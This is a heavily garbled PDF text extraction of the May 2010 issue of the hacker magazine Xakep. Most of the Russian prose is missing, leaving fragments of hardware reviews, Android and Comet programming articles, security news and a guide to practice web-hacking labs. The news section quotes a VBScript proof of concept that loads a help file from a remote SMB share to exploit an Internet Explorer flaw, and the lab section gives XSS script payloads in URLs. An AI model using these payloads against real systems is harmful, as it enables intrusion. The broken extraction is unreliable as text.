Хакер 2010 05 PDF

.
100
x 05 () 2010
.
210
:

TROJAN.WINLOCK
05 (136) 2010
$1000
ANDROID
JIT SPRAY IE8: DEP ASLR
GOOGLE
. 22
. 120
DVD

RDP-
. 96
WINDOWS

*NIX-
136
SQLITE
POWERSHELL 2.0
. 78
UNICODE
. 58
INTRO
:
! .
,

,
.
, iPad.
1 ,
.
, ,
.
, . , ,
,
2-3 ,
. Android,
MAEMO, iPhone, Facebook/
,
.
,

: success story
,
.
!
nikitozz, . .
udalite.livejournal.com
CONTENT
MegaNews
004
FERRUM
016
020
026
028
032
037
083
ASUS N61Ja
088
$1000 Android
042
048
052
ccache distcc
Linux
Dr. Web: 18
096
100
Comet -
Easy-Hack
SQLite
VS
064
JIT Spray IE8
Unicode-
JIT-
106
110
RDP-
trojan.winlock
InPrivate
IE8
C++
SYN/ACK
114
120
126
128
IN DA FOCUS
PowerShell 2.0
134
X-Tools
072
Windows *nix-,

058
070
092

Google
038
078
AM2+/AM3
PC_ZONE
022
140
143
144
PSYCHO: PR-
FAQ UNITED
FAQ
8.5
WWW2
web-
048
,
SQLite
064
JIT Spray IE8
JIT-
100
128
trojan.winlock

PowerShell 2.0
O K
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN/ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)
Dr. Klouniz
(alexander@real.xakep.ru)
>

(bergman@gameland.ru)
> xakep.ru
(xa@real.xakep.ru)
/ART
>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
/DVD
>
Step
(step@real.xakep.ru)
> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824

> GAMES & DIGITAL
(goryacheva@gameland.ru)
>

> Gameland TV

>
(strekneva@gameland.ru)
>

>

>
(ashomko@gameland.ru)
> -

>

(korenfeld@gameland.ru)
>

>
(andrey@gameland.ru)
>
(devald@gameland.ru)
>
(kosheleva@gameland.ru )
>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

. :

. ,

,
.
.

.
.

:
content@gameland.ru
, , 2009
MEGANEWS
MIFRILL
MARIA.NEFEDOVA@GLC.RU
MEGANEWS

3D ? !
LG.
50 40 (LED), W63D
3D ,
.
E50 E40. , 17.5 ,
(CCFL).
45% .
5 , 250 /m2, 5 000 000:1. E50
Smart+: Auto Bright, Dual Web, Cinema Mode Original Ratio,
Two-way Stand, ,
. ,
LG E2350V ( E50) ,
Sustainable Product Certification UL Environment, ,
.
, ,
,
80- .

, ,
. - US-CERT
USB- Energizer DUO,
, . , .
, ESET
Win32/Arurizer.A.
7777- ,
,
, . ,
. Energizer ,
, Energizer DUO , , ,
.
. Metasploit energizer_duo_payload energizer_duo_detect,
.
004
XS

10
2 ,

Winston XS. ,
,

Winston XS. XS
:
( -).
-.
XS

.
X 05 /136/ 10
MEGANEWS

NVidia
,
WHQL 196.75
. , ,
, ,
, .

3D- ,
,
GPU 100C.
, ,
.

, 196.21,
196.75, ,
.
,
Driver Sweeper (www.guru3d.
com/category/driversweeper).
SECUNIA , WINDOWS-
5 .
WINDOWS7

ZeuS . , ,
, ZeuS
. ,
, ,
ZeuS ,

.
. Zeus
Kit 1.3.4.x 3 4
(,
, ),
.
Backconnect $1500, -
Firefox $2000,
Jabber
$500, Vista/Windows 7 $2000.

,
VNC
$10000. .
,
,
,
. Microsoft Windows,
,
, .
,

. , , () ZeuS

1.4. - Firefox (

.

MSI
890GXM-G65, .
AMD
890GX + SB850,
AMD Phenom II,
ATI Radeon HD 4290
HTML-),
.
, ZeuS-
,
.
ZueS ,

.
DirectX 10.1 UVD 2.0

DVI HDMI. SATA 6 / USB 3.0. 890GXMG65 micro ATX
PCI Express x16, PCI Express
x1 PCI. ,
16 DDR3 800, 1066, 1333, 1600, 1800 2133
. CrossFire
Hybrid CrossFire, OC
Genie .
,
RUTRACKER.ORG ( TORRENTS.RU), 5,6 .
006
X 05 /136/ 10
MEGANEWS
, ,
(
, :) ). ,
7996 -
. Code of Trade
Digital Gameland Lays. ,
,
,
Lays. ,
, 400.656.889 ! .
.
J2ME
,
.
Jimm
.
Apple,
,
,
. AppStore,
,
, .
: 170 ,
50 .
, Apple.
iPhone,
.
.
, Android 30
Google,
.

,
. ?
, , -
. ,
, ,
.
.
OFFICE 2010
12 ,
.

, ,
, -,
,
,
, . ,
008
(Popular Science)
,
137 !
, Google Books,
www.popsci.com/archives. ,
,
.
X 05 /136/ 10
!

Thermaltake, mid-tower V5 Black Edition
. ,
? , ( 7,1 508223490 ) 100%
. ,
, :
5.25, 3.5 2.5, ; , ;
eSATA, USB 2.0 . 120-
, 200- ,
120-
. $69.

,
,
. ,
19
,
.
,
15 25 , 3
.
(Stephen Watt) , , . ,
$75 .
. , . ,
.
GOOGLE
, -,
Open Text Corporation Antarctica Systems,
XML, Sun Microsystems,
-.
, Oracle, -
Sun, , .
Google Android,
, , (Now
A No-Evil Zone). ,
Google, Apple iPhone
Android open-source.
: iPhone
, , , ,
. ,
.
, , .
. , ,
Android .
, , . , ,
Google, .
, ,
, . ,
, , , Google
,
. ,
, , ,
Google.cn . , , : ,
, Google
, google.cn
google.com.hk,
.

. , Google
,
.
X 05 /136/ 10
009
MEGANEWS
CAPTCHA
, $25
CAPTCHA?
,
, ,

.
:

,
Ticketmaster, Musictoday
Tickets.com. ,

, ,
IP- . ,
,
CAPTCHA,
( IP-, ).
: 5 10 ,
30 . , ,
reCAPTCHA
, .
,
. captcha,
, .
2002 2009
$25 !
, ,
CAPTCHA.
.
, reCAPTCHA, . , ,
. ,
: https://api-secure.recaptcha.net/image?c=<ID
>.
ID CAPTCHA, .
, ,
, ,
$1-2 1000 ).
70%
.
IE6
Internet Explorer 6 ,
. www.liveinternet.ru,
- 8.8% Opera Mini . , ,
, Google ( YouTube),
Facebook, MobileMe . Google
IE6, .
Aten Design Group ,
- Microsoft,
( ) . : IE6,
MIX, Internet Explorer. Internet
Explorer @ Microsoft. , .

1966 , ,
.
, .
(Association for Computing
Machinery, ACM) $250 . ,
, . 70-
-, Xerox,
Alto.
, , , WYSIWYG. Alto,
Ethernet,
. Microsoft.
010
X 05 /136/ 10
11
MEGANEWS
MYSQL
, MySQL Monty
Sun Microsystems
Oracle, .
,
, ,
open source . ,
.
() Oracle ,
MySQL ,

. , , , ,
Oracle, , , , .

Oracle .
,

42%.
ASUS
Asus ,
, , . , ,
, ASUS Cine5 373x100x80 373x100x100 ,
(
). :
28 (RMS 15 ),
80 20 . ASUS Cine5
3.5 .
(5.1)
. , ,
.

,

,

Mariposa (- ), 13 190 . ,
DNS-,
. ,
Vodafone 3000 HTC Magic,
, Mariposa.
, , Fortune 1000 . , ,
DDP Team. .
Wireshark
(www.paloaltonetworks.com/researchcenter/2009/10/mariposatool), C&C
. : Netkairo,
VPN-
IP.
. Mariposa , -
C&C (comand&control) .
WIMAX FORUM,
WIMAX
620
, 2011
1 .
012
X 05 /136/ 10
013
13
MEGANEWS
,
!
IE6, Microsoft MIX Internet Explorer 9.

: ie.microsoft.com/testdrive,
, .
, , . Internet
Explorer 9 , .
SunSpider IE8
, Opera 10.10 . ,
JavaScript Safari, Chrome Opera 10.50.
HTML5
SVG. CSS3 ,
Acid3 IE9 55
100. GPU- Vista Windows
7, XP XP
.
CANON CANON
,
, Canon ,
, ! ,

2008

,
. ,
, .canon, , ,
,
. Canon ,
URL
. :
ru.a40.canon. Canon
a40.canon.com a40.canon.ru
.
canon.
canon, 2011 ,
ICANN .
WATCHMOUSE , ,
URL- -
.
!
scene.org, ,
.
,
,
Scene.org Awards
014
.
, (

awards.scene.org), :
. , Best Demo, Best Demo on an
Oldschool Platform, Best Effects.
Frameranger
. , ,
geforce 8800,
,
dx9.

Breakpoint, Scene.org Awards.
X 05 /136/ 10
F1 !
Microsoft,
,
, . ,
MS
F1,
( VBScript).
, .
IE ,
.
VBScript,
,
:
MsgBox(prompt[,buttons][,title][,helpfile,context]).
helpfile, ,
,

F1, . ,

. , ,
(http://isec.
pl/poc-isec27) :
<script type="text/vbscript">
big = "\\184.73.14.110\PUBLIC\test.
hlp"
MsgBox "press F1 to close this
annoying popup", ,"", big, 1
</script>

.hlp-,
. ,
Microsoft
,
,
, .
GIGABYTE TECHNOLOGY ASUS

2
3,1-3,3 , 3,2-3,3 .
X 05 /136/ 10
015
MSI
785GTM-E45
FERRUM

MSI
85GTM-E45
IGABYTE
MA785GMTUD2H
GIGABYTE
GA-MA770TUD3P
GIGABYTE
GA-MA785GMTUD2H
ASUS
M4A79T Deluxe
GIGABYTE
GA-MA785GMTUD2H
MSI
790XT-G45
ASUS
M4A78T-E
ASUS
M4A78T-E
AM2+/AM3
, -,
. ,
. , ,
AMD Socket AM2+/AM3

AMD 790FX 790GX.
, SB750. AMD 790GX,
22 PCI Express. , Triple Crossfire
.
? ,
G . ATI Radeon HD3300
. 790, ,
,
. , AMD , 780G 770,
790- 16
PCI-Express. , 780G
ATI Radeon HD 4200. , AMD 790FX, 32 PCI Express,
, . SB750 ,
12 USB-, RAID,
0, 1, 5 10, SATA- .

,
, ,
, . , WinRAR, wPrime 2.00
SuperPi 1.5.
, ,
.
016
:
ASUS M4A78T-E
ASUS M4A79T DELUXE
GIGABYTE GA-MA770T-UD3P
GIGABYTE GA-MA785GMT-UD2H
MSI 790XT-G45
MSI 785GTM-E45
AMD Phenom X4 955 BE (
3.2 ). , , ,
, ,
.
.
BATMAN: ARKHAM ASYLUM, FPS

Palit GeForce GT 240 Sonic
Palit GeForce GT 220 Sonic
Palit GeForce GT 220
Sapphire Radeon HD 5750
0
10
20
30
40
50
60
70
80
NVIDIA
X 05 /136/ 10
GIGABYTE
GA-MA785GMTUD2H
Palit
MSI 7900XT-G45
: 3,2 (16200), AMD Phenom II X4 955 BE

: Sapphire Radeon HD 3450
DDR2: 2x1 , A-DATA AX2U800PB2G4-2P (4-44-12)
DDR3: 2x1 , Aeneon Xtune AXH760UD00-13G
(CL8)
: 1,5 , Seagate Barracuda ST31500341AS
: 750 , Corsair TX750W Power Supply
: 1700 /, Noctua NH-U12P
: Windows XP Professional SP3 x32
ASUS
M4A78T-E
4500 .
: AMD 790GX SB750

: DDR3 800/1066/1333/1600
: AMD RADEON HD 3300
: HIGH DEFINITION AUDIO
LAN: GIGABIT ETHERNET
: 2XPCI EXPRESS X16; 2X PCI EXPRESS X1; 2PCI
: 12XUSB; 2XIEEE1394; IDE; 6XSATA
-, : 24.4X30.5, ATX
ASUS, , .
PCI Express x16, ,
.
, AMD. , .
BCLK
240 , ,
3936 . ,
, .
, ASUS , . , ,
.
X 05 /136/ 10
ASUS
Palit
GeForce GT
240 Sonic
GIGABYTE
GA-MA785GMT
ASUS M4A79T Deluxe
UD2H
0
10
15
20
25
SuperPI 1.5 XS 1m(, )

SuperPI 1.5 XS 1m,
ASUS
M4A79T DELUXE
:
6100 .
: AMD 790FX SB750

: DDR3 1600/1333/1066/800
:
: HIGH DEFINITION AUDIO
LAN: GIGABIT ETHERNET
: 4X PCI EXPRESS X16; 2X PCI
: 12XUSB; 2XIEEE1394; 1XIDE; 6XSATA; 1XFDD; 1SPDIF
IN/OUT
-, : 24.4X30.5, ATX
.
,
AMD Phenom II AM3, DDR3. : AMD Phenom II X4
955 BE 4144 ,
! 259 .
ASUS , M4A79T Deluxe :
, .
, , , ASUS, ,
, BIOS.
, ,
.
. , ,
, , .
017
FERRUM
MSI 7900XT-G45
GIGABYTE GA-MA770TUD3P
ASUS M4A78T-E
0
10
15
wPrime 2.00 32 m ,
wPrime 2.00 32 m ,
wPrime 2.00 ASUS
GIGABYTE
GA-MA785GMT-UD2H
GIGABYTE
GA-MA770T-UD3P
:
3000 .
: AMD 770 SB710

: DDR3 1600/1333/1066/800
:
: 8- REALTEK ALC888
LAN: REALTEK 8111C/D(L) (10/100/1000 )
: 1XPCI EXPRESS X16; 2XPCI; 4X PCI EXPRESS0X1
: 8XUSB; 1XPS/2 (); 1XPS/2 ();
6XSATA; 1XSPDIF IN; 1XSPDIF OUT; 1XIDE; 2XIEEE 1394A
-, : 24.4X30.5, ATX
, , .
PCI, PCI Express x1 PCI Express x16
, , ,
. ,
, .
4 ,
. ,
.
,
. PCI, IDE.
,
, IDE-
. , ,
-, ( 90 ), , -, IDE
.
018
3000 .
: AMD 785G SB710

: DDR3 1800 (OC)/1666/1333/1066
: 8- REALTEK ALC
LAN: REALTEK 8111C
: 1XPCI EXPRESS X16; 2X PCI; 1XPCI EXPRESS X1;
: 1XIDE; 1XIEEE 1394A; 1XLPT; 1XSPDIF IN/OUT; 1XD-SUB;
1XDVI-D; 1XESATA; 1HDMI; 1XPS/2 (); 1XPS/2 ();
1XRJ45 LAN; SPDIF OUT; 6XUSB
-, : 24.4X21.8, MICROATX
MicroATX . ,
,
, . ,
, Gigabyte ATI Radeon HD 4200,
, .
, Ultra Durable 3, ,
.
,
. , , PCI
SATA PCI Express
x16 . ,
225 .
.
X 05 /136/ 10
MSI 7900XT-G45
GIGABYTE GA-MA770TUD3P
ASUS M4A78T-E
0
1000
2000
3000
WinRAR .
WinRAR .
MSI
790XT-G45
2800 .
: AMD 790X SB710

: DDR2 1066/800/667/533
:
: 8- REALTEK ALC889 / ALC885
LAN: REALTEK ALC889 / ALC885
: 2PCI EXPRESS X16; 2PCI EXPRESS X1; 2PCI
: 1FDD; 6X SATA; 1XATA133 HD; 1XSPDIF-OUT; 1XTPM;
1XPS/2 (); 1XPS/2 (); 6XUSB; 1XCOM
-, : 24.4X30.5, ATX
, MSI 790XT-G45
PCI Express x16,
. ,
. , ,
, 243 ,
. , , .

. , COM-
FDD, . , DDR2,
,
, DDR3.
,

AMD AM2+/AM3
X 05 /136/ 10
2400 .
MSI
785GTM-E45
: AMD 785G SB710

: DDR2 1066/800/667/533
: REALTEK HIGH-END AUDIO
LAN: REALTEK ALC889 / ALC885
: 1PCI EXPRESS X16; 2PCI; 1PCI EXPRESS X1
: 1XIDE; 4XUSB; 6XSATA; 1XATA133; 1XSPDIF OUT; 1XTPM;
1XPS/2 (); 1XPS/2 (); 4XUSB; 1XRJ45; 1XDVI-D;
1XVGA; 1XHDMI
-, : 24.4X21.8, MICROATX
,
. , ,
243 , ,
MSI 790XT-G45. . , MSI 785GTM-E45 - MicroATX,
.
, ATI Radeon HD 4200,
, PCI Express x16.
, .
, ,
, , .
.
,
, . ASUS M4A79T
Deluxe, .
,
.
GIGABYTE GA-MA770T-UD3P
. z
019
FERRUM

ASUS N61Ja

.
, , ASUS N61Ja
.
.

,

.
, ASUS N61Ja Intel Auburndale IMC
Intel Core i7-620M,
2,67 ,
3,3
Intel Turbo Boost.
.
CPU,

Super PI. -
020

13
, . ,
Intel Core i7.

ASUS N61 Intel Core i5-430M,
NVIDIA
Optimus , , GeForce GT325.
.

. 640
.

, .
16 LED-

1366x768.
.
, .
USB 3.0

.
USB 2.0,
. ,
(
)
ATI Mobility Radeon
X 05 /136/ 10
HD 5730 Intel GMA HD.

,
.
. , ,
.
.
ASUS N61Ja . ASUS

N61 , , ,
. ,
,
, .
,
. -, ,
-, .

. Num Pad. multitouch,

. , .
( )
.
, .
.
.
: (
), , ,
. ,
.
ASUS N61J . ,
, , .
. , .

Futuremark, ,
(Geekbench Crystalmark). Super PI (,

) , WinRAR (
).
, -
,
SuperPI mod.1.5 XS, 1M: 13,4

WinRAR: 1124 /
3DMark03: 21717
3DMark06: 7789
CrystalMark 2004R2: 149254
Geekbench: 4841
PassMark Performance Test: 704,3
CPU/HDD: 51/34
: 2 32
Wi-Fi: 2 18
: 1 33
X 05 /136/ 10

: 16, 1366x768,
: Intel Core i7-620M, 2.67
: Intel HM55 Express Chipset
(Auburndale IMC)
: 4096 DDR3-1066
: ATI Mobility Radeon HD 5730,
1024 + Intel GMA HD
: 640 , Toshiba
MK6465GSX, SATA HDD, 5400 /
: HL-DT-ST GT30N, DVD-RW
: 1 USB 3.0, 2x USB 2.0, 1x e-SATA,
ExpressCard/34, HDMI, VGA, 2xAudio, -
: Wi-Fi 802.11b/g/n,
Bluetooth 2.1+EDR, LAN
: 4400 , Li-ion
: Windows 7 Ultimate x64
, : 384x264,9x37,3
: 2,79
.
Readers Test ( , Battery Eater
Pro 2.5), Wi-Fi.
,
.
DVD- ,
, .
. ,
- , . -,
, . -
. -,
, . ,
. ,
, ASUS N61Ja . z
ASUS N
trendclub.ru.
Trend Club ,
. Trend Club , ,
.
Trend Club Intel ASUS .
Intel, , , ,
. Intel Web Intel http://www.intel.ru, http://blogs.intel.com.
Intel
www.intel.ru/rating.
021
PC_ZONE
dotcypress@gmail.com
$1000
ANDROID

Google
.
. Android .
2 $1000.
, :)!
,
, .
, ,
. ,
,

Android.
,
.
ANDROID?
Google Andoid ,
Linux. Google,

Android, Inc.,
2005 , . 2008
. Android
,
.
022
100
Android HTC, Motorola, Samsung, Dell,
Huawai, Sony Ericsson
. , Google,
60
Android-
, . ,
, Google?

HTC G1 .
. ,
,

- , HTC
Nexus One Motorola Droid.

, .
ANDROID
. ,
,
, .

,
,
, ,
. ,
, Apple,
App Store. Nokia Nokia Ovi Store, Microsoft
Windows Phone
Microsoft Market
Place. Android
Android Market.
-,
X 05 /136/ 10
Android Market

-.
,
. , : App Storee ,
,
Android Market
. iPhone
,

, ,
,
. Android Market
.
:
iPhone
AppStore, Android
.
,
, .
Android
, . , Android Market ,
30 . ,
App Store,
. Market (
),
, ,
.
, Google Checkout,
, PayPal, . , ,
ex-USSR
. (
), X 05 /136/ 10
Android
- , .

, . moneyback
24 .
, , ,
? :) , :
, , .
,
, .
, Android Market,
.
, Google -, ,
, .

, . ,
Android
Market ( ), , $25.
. ? ! ,
( ),
.
,
Merchant Account Google Checkout, ,
, . PayPal,
,
. !
,
.
,
. -,

10-20% . ,
. , -
, .
:
SlideME (www.slideme.org);
AppsLib (www.appslib.com/developers);
AndAppStore (andappstore.com).

Android Market:

. ,
, . SlideME

. , , ,
, . Android
,
.
,
iPhone,
Android. ,
. Android, ,
.
SlideME :

.
023
PC_ZONE
Xmas Tree Quattro Wireless
Xmas Tree,
$1500 2
$$$
, . :

,
, .
,
. AdWare,
.
,
,

- .
, -
024
! (, ) ,

Android Market,
.
. ,

, ,
. ,
-,
- ,
:
Quattro Wireless (quattrowireless.com);
AdMob (admob.com).
: ,

.
, .

,

.
, .
,
/ (
CTR),
, ,
.
:
,
, . :
, ,
adult-.

,

.

, Android Market.
,
, . Android
Market (market.android.com/publish/Home),
, . 5
,

.
,
: 2
200 .
2009 1100 .
, .
.
Xmas Tree

wallpaper'
.
,
X 05 /136/ 10
INFO

ANDROID?

Java. ,
:
Android SDK (developer.android.com/sdk);
IDE Java (Eclipse, IntelliJ IDEA,
NetBeans ).

developer.android.com.
Google Android
, . developer.
android.com
IDE, ,
,
. Android
Native Development Kit .

Android,
SDK
USB.
, SDK
(developer.android.com/guide/developing/
tools/emulator.html).
,
. Android
Emulator'
, , , SMS , ..
, .
,

Google Android. :
,
WebView, . , ,
JavaScript
( Flash').

. ,
,

Android.
,
. AdWhirl
(www.adwhirl.com),
Admob Quattro
Wireless. ,
,
( ). Adwhirl SDK,
.
Android Emulator'

X 05 /136/ 10
:

. ,
- Android Market' www.
androlib.com. ,
2-3 , ,
Java, . 6 ,
.
Quattro Wireless 2
100 . Admob.com , , .
: , PayPal,
EFT.
Quattro Wireless,
PayPal, .
EFT
( ).
( , SWIFT
,
).
. $30, ,
.
, , ,
.
,
. , Android
..z
info

Android Market
,
,
, ,
, , , ,

.

Merchant Account
Google Checkout.

,
,
SIM-
(,
T-Mobile). MarketEnabler (code.
google.com/p/marketenabler) MarketAccess
(amip.org.ru/wiki/
android/marketaccess).
DVD
dvd

SDK

Android.
HTTP://WWW
links

Android: androiddevelopers.blogspot.com

Android: developer.
android.com/videos
100 Android,
:
www.googleandblog.
com/over-100different-androidphones/31530
025
PC_ZONE
lenskyi.d@gmail.com
DR.
WEB:
18
-

Doctor Web
1992 . , ,
,
, .
- .
, , Dr.Web
.
, .

, . ,
Dr.Web
.

.,
..

, ,
. ,

,
. ,

: ,
.
?
Dr.Web
CureIt!,
. ,
Dr.Web, , ,
.
- -
026

Dr.Web Security Space Pro,
.
,

,
. ! ,
(
CureIt!),
. ,

Snapshot',
, - .
, ,
.
,
. ,

( Dr.Web
SelfPROtect). ,
,
CAPTCHA'
, .
, :
,
,
(
, ).
API-
.
,
.
, Dr.Web
.
, .
, ,
.
, , , .
: ,
, , , .
,

.
- ,

(,
? !).
Windows XP

.

,
TrueImage.
,
? , , -
! .
- ,
, ,
,
, , ,
, .
, NTFS
, , , .
,
X 05 /136/ 10
SpIDer Guard'
RUSTOCK.C
MAOSBOOT
SHADOW.BASED
R SECTOR
MEBROOT
TDL
BOAXXE
XORPIX
TROJAN-SPY.ZBOT
TROJAN.OKUKS
TDL3
+
+
+
+
+
+
+
+
+
+

,
, .
,
, + .
,
Mebroot', ,
,
.
SpIDer Guard,
,
. , ,
GMER ,

.

, Dr.Web Security Space Pro
. ,
. ,
,
:
.
,
Dr.Web
Security Space Pro. (, ..)

,
.
, HTTP- SpIDer Gate.

Firefox'
:).
-,
HTTP-
. ,
HTTP-,
www.malwareurl.com,
: SpIDer Gate
iframe' JS-.
,

Dr.Web,
. SpIDer Mail ,
.
, ,

.
, Dr.Web
Security Space Pro . ,

,
, ,

. ,
: - . z
X 05 /136/ 10
027
PC_ZONE
aleks.raiden@gmail.com
Presence
Real Time Web
XMPP
Push, not pull

FlashSocket
BOSH
WebSocket
Strophie
Kaazing
APE
Comet
Jetty
node.js
js.io
Realtime
-
Comet
-
- . AJAX, . , , , ,
. Comet.
-,
,
HTML- ,
, .
. ,
,
.

.
,

. ,
-,
-
. -,
028
,
, , , Comet.
AJAX
,
, , , .
, Comet
,
( )
.

, -
.
AJAX, , -
, .
, AJAX
,
, . ,
AJAX ,
, HTTP, -. Comet,
, ,
.
Comet'
, (),
,
serverX 05 /136/ 10
AJAX ,
.. 2.0
push.
: ,

. ,
Flash, , .
-
AJAX, Flash,
, .
Comet JavaScript + HTML,

.
Comet
?
, , , -
XMLHttpRequest,
JavaScript , .

HTTP-: URL
. , AJAX

(/),
, 10 ,
, .
,
: ,
,

, . ,
,
.
:
, ,
.
, AJAX
.
Comet'. ( Long-polling, )
,
.
:
, ,
. ,
, :
- ,
. ,
,
!

.
,
. 5 ,
. ,
,
HTTP .

(Streaming) ,
,
. ,
,
-
. ,
,
,
,
,
Long-polling.
, ,
. , , ,
, ,
?
?
HTTP-
,

. ,
.
, Comet,
- -
Comet' Streaming
X 05 /136/ 10
Ajax' Comet-.
10 .
: .

(hidden iframe).
Comet',
HTML- ,
.
: <iframe>,
-.
HTML-:
, JavaScript,
,
. ,
, , - ,
.
, :
- .

<script>, . ,
.

, - ,
: , .
, ,
<script>,
, .
, 5 ( ).
,
, .
, , , , .
( JS- jQuery):
029
PC_ZONE
WEBSOCKETS!
Long-Poling
WebSockets,

HTML 5
var error_timer_id = null;
function error_iframe()
{
$('#comet_iframe_panel').
empty().append('<iframe
src="comet.domain.com/comet.
php?user_id=1"></iframe>');
}
function comet_ping()
{
clearInterval(error_timer_id);
setInterval(function(){ error_
iframe(); }, 5000);
}
function comet_new_message(msg)
{
$('#comet_msg_content').
append('<div>' + msg.time + ': '
+ msg.text + '</div>');
comet_ping();
}
, ,
(
PHP):
$timeout = 1000;
$running = true;
while($running)
{
$msg = '{time:'.date('m:s',
time()).',text:Server says:
OK!}';
echo '<script>comet_new_
message(.$msg.);</script>;
usleep($timeout);
}

Comet',
030
.
- .
, ,
,
. .
,
, gzip-
Comet .
,
, .
,
,
iframe.

, .
Longpolling
JavaScript :
, jQuery :
$.getJson(http://comet.domain.
com/comet.php, function(response)
{});.
, :
,
, . , JSON,
,
AJAX.
,
!
, omet-
,
.
.
JavaScript

. !
. Comet': , ,
(,
Lightstreamer 50 ).

,
HTML 5
, ,
.
-.
,
,
.
, WebSockets
HTTP-,

()
.
: HTTPGET ,

,

TCP- !
TCP- ,
, HTTP-.
- ,

,
UTF-8 (
)
.
-
AJAX
Comet.
, , -,
Google Chrome. -
, ,
. web-socket-js (github.com/gimite/
web-socket-js), API,
,
Flash-,

, .
,
API,
.
Cometd (cometd.org), HTTP_Push_Module
(pushmodule.slact.net), APE push engine (www.
ape-project.org).

, Denwer,
.
Dklab_Realplexor Perl ,
,

.
long-polling,
, ,
JavaScript .

- ,
,
.
, - JS- X 05 /136/ 10
LONG-POLLING VS. STREAMING

? . , ,
(,
/ , ),
Long-polling
.
,
JavaScript,
AJAX-.
,
,
, , , . , ,
,
. . , ,
,
.
Comet-
,

, !
,
callback, .
,
, ,
.

(,
)
( ,
,
).

. AJAX',
Comet.
( ).
, PHP:
// ,

include_once(Dklab/Realplexor.php);
//
$dklab = new Dklab_Realplexor("127.0.0.1",
"10010", "xakep_");
//10010
//xakep_ ,

$_to = Array(all_online); // , .
, ,
$_message = Array('text' => ' !, 'author' => ', 'time' =>

time());
X 05 /136/ 10
// , JSON
$dblab->send($_to, $_message);
// !
JavaScript , , :
//
var comet = new Dklab_Realplexor('http://
rpl.domain.com', 'xakep_');
//
// ,

comet.subscribe("all_online", function (msg,
id){
//

//id
$('#comet_msg').append('<div><b>' + new
Date(msg.time * 1000).toLocaleString() +
'</b> ' + msg.author + ': ' + msg.text +
'</div>');
// ,
-
JSON
});
come.execute(); //

//
,
comet.execute(),
//,
comet.unsubscribe(all_online);
Comet
- . ,
,
, . ,
Comet ,
Dklab_Realplexor.
- . ,
Dklab_Realplexor
, , Facebook'e.
HTML5
, HTTP,
, , , - , .
? Comet
, -,
..z
INFO
info

Comet
, ,
comet.domain.com,

26
,

,
, .
.
HTTP://WWW
links
:
websockets.ru/tech/
intro

AJAX-:
javascript.ru/ajax/intro

:
Java atmosphere.dev.
java.net;
.NET www.
frozenmountain.com;
Python orbited.org;
Ruby juggernaut.
rubyforge.org;
PHP github.com/
kakserpom/phpdaemon.
031
PC_ZONE
Step step@glc.ru
.
, ? , , VPN ? , ? !
: ?. : , .
, . , ,
,
,
. ?
,
? .
, , . , -,
,
. ,
-, , ,

.
, , ,
. !
,
, .
,
.
, .

,
,
,
, -
032
.
,
][- (, , ring0cup.ru),

-,

. .
DAMN VULNERABLE WEB APP
-
, WAF (
-) ,
. Damn Vulnerable Web App,
, , - ,
:).
- ,

.
PHP/
MySQL,
DVWA.
-,
:
Denwer' (www.denwer.ru) XAMPP' (www.
apachefriends.org/xampp-en.html). ,

public html-
http://127.0.0.1/dvwa/index.php.
:
Create / Reset Database.
- ,
/config/config.
inc.php.
PHP: , PHP.ini
.
magic_quotes_gpc = Off
allow_url_fopen on
allow_url_include on
, 2009
,
X 05 /136/ 10
bat. J2EE.
3.
http://localhost/WebGoat/attack.
4. guest/guest.
5. .
, ,
. ,
SQL-

.
, .
SECURIBENCH
, SQL inj/XSS
,
.
MUTILLIDAE

-
.

,
.
:
,
-.
Mutillidae.
OWASP
Top 10: SQL-, XSS, CSRF
,
.
,
. DWVA,

XAMPP-,
Setup/
reset the DB .

OWASP
Top 10 (www.owasp.org/index.php/OWASP_
Top_Ten_Project) , ,
Mutillidae. ,
.
WEBGOAT
Mutillidae ,

, , , WebGoat. ,
OWASP (Open Web Application Security
Project),
security-.

PHP-, , Java.
J2EE-
X 05 /136/ 10
J2EE

WebGoat,
Stanford SecuriBench. ,
,
8 .
Java:
jboard, blueblog
. ,
,
.
, ,
,
SecuriBench J2EE
TomCat- ,
WebGoat , :
1. WebGoat-OWASP_
Standard-x.x.zip .
2. TomCat', webgoat.

,
.
,
. -
][-, , .
ring0cup.ru,
, ,
, , . , ,
:
mod-x.com. ModX, .
, ,
.
hax.tor.hu/welcome. , 5
.
quest.fsb-my.name/index.php. ,
, .
vicnum.ciphertechs.com. Capture the flag,
][-. , , (sourceforge.net/projects/vicnum).
. , ,
, hackergames.net, 150
, .
033
PC_ZONE
Moth VMware
WARNING
info

.

,

.
DVD
dvd

DVD

034
. , SecuriBench
,
, Tomcat.
,
,
, ,
SecuriBench , .
MOTH
,
Moth.
,
,
Ubuntu 8.10. , , , VMware,
,
VMware Player (www.vmware.com/products/
player). Moth
DHCP-, ,
( , ,
IP , Bridged,
).
,
(moth/moth), ifconfig'
IP Moth :
http://<moth-ip_address>. ,
:
Wordpress 2.6.5, Vanilla 1.1.4
PHP/MySQL, Java + Tomcat6 +
MySQL. : ,
mod_security, PHP-IDS:
1. http://moth/w3af/audit/xss/simple_xss.
php?text=<script>alert('xss');</script>
2. http://moth/mod_security/w3af/audit/xss/simple_
xss.php?text=<script>alert('xss');</script>
3. http://moth/php-ids/w3af/audit/xss/simple_
xss.php?text=<script>alert('xss');</script>
Mod_security PHP-IDS WAF (Web
Application Firewall)
- (
- ).

, -
, WAF .
,
,
Python Ruby.
Moth
. ,
, Moth ,
.
,
w3af (w3af.sourceforge.net),

-. ,

. ,
? , Acutenix WVS
: testphp.acunetix.
com, testasp.acunetix.com, testaspnet.acunetix.com.
HP ( HP WebInspect)
zero.webappsecurity.com.
IBM Rational AppScan demo.testfire.net.
,
.
Damn Vulnerable Linux
pWnOS
- ,
root'. : , X 05 /136/ 10

03&*
/"4
*/5&-$

*(
(#*"!&!
$
(%
&
'
+
(
)
,+*

%0./
230
.3-.
43210/
/"4
3"*%
8889 "3%36
49

2010
04 (74)
VGA
